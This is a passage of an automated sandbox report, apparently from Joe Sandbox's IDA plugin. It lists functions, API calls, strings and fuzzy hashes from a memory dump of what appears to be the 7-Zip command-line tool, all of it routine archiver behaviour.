Opcode Fuzzy Hash: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
Instruction Fuzzy Hash: CA41B2632087C095CB34EB29E5503EE67A5F784BA8F489526EE8E07719CE78C585CB40

Function 00979828 Relevance: 9.1, APIs: 6, Instructions: 123COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00979898
free.MSVCRT ref: 009799E7

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ErrorLastfree
String ID:
API String ID: 2167247754-0
Opcode ID: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
Instruction ID: d8f3ed550d096027e38777ab2856a457ab2acbc2dfbf43e27caea496864693d0
Opcode Fuzzy Hash: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
Instruction Fuzzy Hash: A541DD2321C58085DA20EB15E4913AEB324F7D2760F90C326EBED87AD9DF38C946D705

Function 00976A04 Relevance: 9.1, APIs: 6, Instructions: 74fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32 ref: 00976A42
MoveFileW.KERNEL32 ref: 00976AA6
free.MSVCRT ref: 00976AB6
free.MSVCRT ref: 00976AC1
free.MSVCRT ref: 00976ACF
free.MSVCRT ref: 00976ADA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$FileMove
String ID:
API String ID: 288606353-0
Opcode ID: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
Instruction ID: 67325443da2508fe9bd8b624dee0e672edc58d07158a32ac576afab3ce770773
Opcode Fuzzy Hash: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
Instruction Fuzzy Hash: 2911DA2335894145CA20EF25E8517BF5724EBC2BE0F48D221FEAE57366DE29CC86C700

Function 00977B70 Relevance: 9.1, APIs: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 0097794C: FindClose.KERNELBASE ref: 0097795E

SetLastError.KERNEL32 ref: 00977BAA
SetLastError.KERNEL32 ref: 00977BB9
FindFirstStreamW.KERNELBASE ref: 00977BDB
GetLastError.KERNEL32 ref: 00977BEA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ErrorLast$Find$CloseFirstStream
String ID:
API String ID: 4071060300-0
Opcode ID: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
Instruction ID: 26f01d025b3ca4f4b1c826eb365c2692ceabc968ba8a9ea3e233e134625383ed
Opcode Fuzzy Hash: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
Instruction Fuzzy Hash: 4621B023208B4082DA219B65E8543A9A364FBDAB74F58D321DEBE477E5DF3CC949C200

Function 009BCCF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009BCD1C
fputs.MSVCRT ref: 009BCD31
free.MSVCRT ref: 009BCDDC
free.MSVCRT ref: 009BCE23

Strings

(Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? , xrefs: 009BCD2A

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputsfree
String ID: (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit?
API String ID: 2581285248-171671738
Opcode ID: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
Instruction ID: 2081518079a5a0f1d74f417af18a99a39a3627a782181fa96ae9727c10a77c9a
Opcode Fuzzy Hash: 4b5025059e70d1de0ed5aeed492243599037d1a5b9a8e456c84aaac635c9e110
Instruction Fuzzy Hash: C931D8A6208545C7EB309B18DAA53E92765E3C47B5F884132EB5E073E6CB1CCCA5D701

Function 009711B8 Relevance: 8.8, APIs: 7, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 00973314: memmove.MSVCRT ref: 00973339

free.MSVCRT ref: 00971215
free.MSVCRT ref: 0097121D
free.MSVCRT ref: 009712AA
free.MSVCRT ref: 009712B5
free.MSVCRT ref: 009712C4
free.MSVCRT ref: 009712CF
free.MSVCRT ref: 009712DA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 150ae877ff484c22bc24b8578f302cb24d5b1ad4491463f4b87d27cac02bb206
Instruction ID: c7cb29a3e385086481af6c65faa41c7cf79de19334ed50da94d5f6f45288f617
Opcode Fuzzy Hash: 150ae877ff484c22bc24b8578f302cb24d5b1ad4491463f4b87d27cac02bb206
Instruction Fuzzy Hash: 9921786331994055CE20EF25E85135EA720EBC27D4F94D221FB6E577BADF28C646C710

Function 009B64C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

fputs.MSVCRT ref: 009B64EB
fputs.MSVCRT ref: 009B64FB

Part of subcall function 009B6460: fputs.MSVCRT ref: 009B64B3

fputc.MSVCRT ref: 009B6534
fputs.MSVCRT ref: 009B659B

Strings

Time =, xrefs: 009B64F4

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$fputc
String ID: Time =
API String ID: 1185151155-458291097
Opcode ID: 16a4f377ae2496a292c66f8ada87fd246b35ce43fff94a3fe0e30452b0aef1ee
Instruction ID: 1c6a976991d705af7c78eeedab79e03c76d83c0f58479ae55a7102a5bc35b89d
Opcode Fuzzy Hash: 16a4f377ae2496a292c66f8ada87fd246b35ce43fff94a3fe0e30452b0aef1ee
Instruction Fuzzy Hash: 6421A595350A1185FA08AF2AFE543995356A788FD4F08E036DE1E0776ADE3CD856C300

Function 009AF69C Relevance: 8.8, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 009AF6C5
memmove.MSVCRT ref: 009AF70E
free.MSVCRT ref: 009AF727
free.MSVCRT ref: 009AF72F
memmove.MSVCRT ref: 009AF74B
LeaveCriticalSection.KERNEL32 ref: 009AF757
_CxxThrowException.MSVCRT ref: 009AF773

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CriticalSectionfreememmove$EnterExceptionLeaveThrow
String ID:
API String ID: 202075352-0
Opcode ID: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
Instruction ID: 1970941f5bb9673ec7e91ab1bc852c738fddda8ce43b9a1209512c828f50a8fc
Opcode Fuzzy Hash: c1de02b68f69ecc8d262e9e614d11b3dc807500ecf55debccae22723f41cb44a
Instruction Fuzzy Hash: 3C21A47722065486C760EF26D4517AC7321F381BF5F905326EE29076A5DF35C845CB40

Function 0099D078 Relevance: 8.8, APIs: 7, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0099D0AB
free.MSVCRT ref: 0099D0B8
free.MSVCRT ref: 0099D0EB
free.MSVCRT ref: 0099D0F3
free.MSVCRT ref: 0099D103
free.MSVCRT ref: 0099D10D
free.MSVCRT ref: 0099D117

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
Instruction ID: 54cc95c0b13f41e8cdc1cc14cd373ef23c6da8cfccd0e88ebaba7938d01eb205
Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
Instruction Fuzzy Hash: 66111E23316A8485CB11EF3AD8917692320FBC6FA8F5882719F6D577A9CE24C847C324

Function 009994A8 Relevance: 8.8, APIs: 7, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009994DB
free.MSVCRT ref: 009994E3
free.MSVCRT ref: 009994F0
free.MSVCRT ref: 0099951C
free.MSVCRT ref: 00999525
free.MSVCRT ref: 0099952D
free.MSVCRT ref: 0099953A

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
Instruction ID: 8fa331854d0ab2e3dd13e9b1bd30f91989ef20c349f78f67f7eaf4092be76e78
Opcode Fuzzy Hash: 5256221f962b44b0bae35b382dbe45db83359140e8ddd7a193f45a58e1d598c8
Instruction Fuzzy Hash: F601A523715990898F22EF2FDC512696325FBD5FE47594225EF2D1B359DE20CC42C360

Function 009AECDC Relevance: 8.8, APIs: 7, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009AED0F
free.MSVCRT ref: 009AED1C
free.MSVCRT ref: 009AED29
free.MSVCRT ref: 009AED59
free.MSVCRT ref: 009AED61
free.MSVCRT ref: 009AED6E
free.MSVCRT ref: 009AED78

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
Instruction ID: abbcc2a87e9cce59e8f4ec081767ef2dd42eb90aba30e553f3c14ffb7b9afa27
Opcode Fuzzy Hash: a7c0efb318bb74a8d890d53e5fdb20e58762af4d74ce4d6a5953f08b0b6776bf
Instruction Fuzzy Hash: 3111212375694085CB20AF36D85176D2314FBC7FA4F588271AF6D5B7A9CE24C846C360

Function 009B6B3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B6B7C

Part of subcall function 00976618: FormatMessageW.KERNEL32 ref: 00976676
Part of subcall function 00976618: LocalFree.KERNEL32 ref: 00976698

Part of subcall function 00972320: free.MSVCRT ref: 0097237E
Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
Part of subcall function 00972320: free.MSVCRT ref: 009723C4

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

free.MSVCRT ref: 009B6BAE
fputs.MSVCRT ref: 009B6BCC

Strings

----------------, xrefs: 009B6BC5
: , xrefs: 009B6B75

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputsfree$FormatFreeLocalMessagefputc
String ID: : $----------------
API String ID: 1215563195-4071417161
Opcode ID: a1891ed469a183347d2f6cf8ed5e79c02ed55b8146c20c8c025d0fedb9797568
Instruction ID: 5d60b9e1b365d667225107eca4ea87af88979a2550be89a3ef535358cd758f1f
Opcode Fuzzy Hash: a1891ed469a183347d2f6cf8ed5e79c02ed55b8146c20c8c025d0fedb9797568
Instruction Fuzzy Hash: 72015B63704A0585DA20EF26E99476E3321F788BE4F588226EE6E077A5CF28D946C700

Function 009B430C Relevance: 8.8, APIs: 7, Instructions: 40COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009B431C
free.MSVCRT ref: 009B4325
free.MSVCRT ref: 009B432E
free.MSVCRT ref: 009B4337
free.MSVCRT ref: 009B4362
free.MSVCRT ref: 009B436B
free.MSVCRT ref: 009B4373

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
Instruction ID: 9825981d145664f08d3910c5a5062351e744896c86f35447ded80d3b888ff5e7
Opcode Fuzzy Hash: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
Instruction Fuzzy Hash: 9AF03C23B2585089CB11AF37DE912AC2324BBC6FE47998161AF1D5B35ADE20C853C3A0

Function 009BBCA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009BBCD4

Part of subcall function 00972320: free.MSVCRT ref: 0097237E
Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
Part of subcall function 00972320: free.MSVCRT ref: 009723C4

fputs.MSVCRT ref: 009BBD17

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

free.MSVCRT ref: 009BBD2B

Strings

Write SFX: , xrefs: 009BBCCD
: , xrefs: 009BBCE9

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputsfree$fputc
String ID: : $Write SFX:
API String ID: 3584323934-2530961540
Opcode ID: 2aff07aef23fae9920ced389d97e2e1f62bb88a79c222afd3b495df10a0729ce
Instruction ID: 01b8c2a4398c2c187f5392b9a18f5ba404999fab39476db23f107d4de8e55686
Opcode Fuzzy Hash: 2aff07aef23fae9920ced389d97e2e1f62bb88a79c222afd3b495df10a0729ce
Instruction Fuzzy Hash: 1F01F4A231494080DA20DB26ED5479E6321E7D4FF4F48D631AE6E477A9DF28C586C710

Function 009BBB18 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009BBB49
fputs.MSVCRT ref: 009BBB76

Part of subcall function 00972568: free.MSVCRT ref: 009725B5
Part of subcall function 00972568: free.MSVCRT ref: 009725C0

Strings

Creating archive: , xrefs: 009BBB3E
Updating archive: , xrefs: 009BBB34
StdOut, xrefs: 009BBB6C

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputsfree
String ID: Creating archive: $StdOut$Updating archive:
API String ID: 2581285248-1319951512
Opcode ID: 5f5adb3b3a84b5c65e0bca1f05b3611791ef6013b907f1f29a1bbb4614530b65
Instruction ID: 7ac0d6fb849dff7a274523bbe522b30b02f44d8ce446a61aed3e9c34baf27c03
Opcode Fuzzy Hash: 5f5adb3b3a84b5c65e0bca1f05b3611791ef6013b907f1f29a1bbb4614530b65
Instruction Fuzzy Hash: 11F062A6701A45C1DE04DF2AEA987AC6322AB88FE4F48D4328D0F0B359DF2CC4898310

Function 0097ECDC Relevance: 8.8, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0097ECE9
free.MSVCRT ref: 0097ECF2
free.MSVCRT ref: 0097ECFB
free.MSVCRT ref: 0097ED04
free.MSVCRT ref: 0097ED0D
free.MSVCRT ref: 0097ED16
free.MSVCRT ref: 0097ED1F

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
Instruction ID: d2bc19cabd76860e8614cb3a33bc212d05607146d15e76aa096ddf86d9c9d3e2
Opcode Fuzzy Hash: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
Instruction Fuzzy Hash: B3E0E92363840481DB14FF77DCA222C3324FBD5F8875494A29F2E8B325CD24C852C3A4

Function 00983F0C Relevance: 7.7, APIs: 6, Instructions: 191COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00983F5A
free.MSVCRT ref: 00983F62
free.MSVCRT ref: 00983FC0
free.MSVCRT ref: 00983FC8
free.MSVCRT ref: 00984007
free.MSVCRT ref: 0098400F

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
Instruction ID: c1e2e8a1f4a8b9de2973abfee083887063c8672e763dfbdb9fd6a0de57ed4546
Opcode Fuzzy Hash: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
Instruction Fuzzy Hash: B8813463305AC485CB14EF2AD8842AD77A5F785F98F498122DF5D0BB69CF35C886C351

Function 0099E954 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

Q, xrefs: 0099E9E8

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID:
String ID: Q
API String ID: 0-3463352047
Opcode ID: f10b8452263e2253671aa6e26e66aae54564acf07f5c2ea8efc5759ba0d9d814
Instruction ID: e67d8e412fbf0d94a2c93f66c6c73eba5264fb1416e8b9da0f31bbc75c29a569
Opcode Fuzzy Hash: f10b8452263e2253671aa6e26e66aae54564acf07f5c2ea8efc5759ba0d9d814
Instruction Fuzzy Hash: D8616F63319A8082CF20DF2AE48066EB765F7C8B94F549611FB9E57768DF79C885CB00

Function 009888EC Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00988930

Strings

page:, xrefs: 00988A30
act:, xrefs: 009889E3
cpus:, xrefs: 00988A0D
gran:, xrefs: 00988A7B

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID: act:$ cpus:$ gran:$ page:
API String ID: 1294909896-454015223
Opcode ID: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
Instruction ID: 668eb6845594641ab221064142d8550520610f6a0865972b844bc87078b19437
Opcode Fuzzy Hash: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
Instruction Fuzzy Hash: 3551C56635060192DE28FB16E9613A92325EBC97D0F84D136EA0F4BB9AEF7CC555C340

Function 00980160 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009801D7
_CxxThrowException.MSVCRT ref: 009802EA

Part of subcall function 0097FD30: _CxxThrowException.MSVCRT ref: 0097FE50

_CxxThrowException.MSVCRT ref: 0098031F

Strings

There is no second file name for rename pair:, xrefs: 00980302
Empty file path, xrefs: 009802CD

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ExceptionThrow$free
String ID: Empty file path$There is no second file name for rename pair:
API String ID: 3129652135-1725603831
Opcode ID: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
Instruction ID: e3895d8cd045b2fc13724e80886bf7ff7dbba3ae22780bc4f88f4734ba7c1262
Opcode Fuzzy Hash: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
Instruction Fuzzy Hash: 46418F62208684C5CA30EB19E84479E6B60F3D57B4F908712EEB9077E9DB79C599CB40

Function 009903BC Relevance: 7.6, APIs: 5, Instructions: 108COMMON

Download Yara Rule

APIs

GetFileSecurityW.ADVAPI32 ref: 00990415
GetLastError.KERNEL32 ref: 00990448

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
